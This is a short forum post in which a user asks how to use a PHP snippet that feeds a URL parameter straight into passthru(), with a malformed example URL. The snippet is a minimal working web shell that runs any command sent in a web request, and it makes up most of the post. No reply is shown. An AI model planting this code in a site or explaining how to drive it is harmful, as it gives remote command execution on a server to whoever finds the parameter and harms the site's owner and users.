Thread
:
php cmd command help
View Single Post
#
1
04-25-2025, 11:35 PM
tssss
Join Date: Nov 2023
Posts: 0
if i put this code in php script
how can i use this ?
if(isset($_GET['lol'])){
echo '<pre>';
passthru($_GET['lol']);
exit();
}
http://www.site.com/index?lol.php
?
can some one help
tssss
View Public Profile
Find all posts by tssss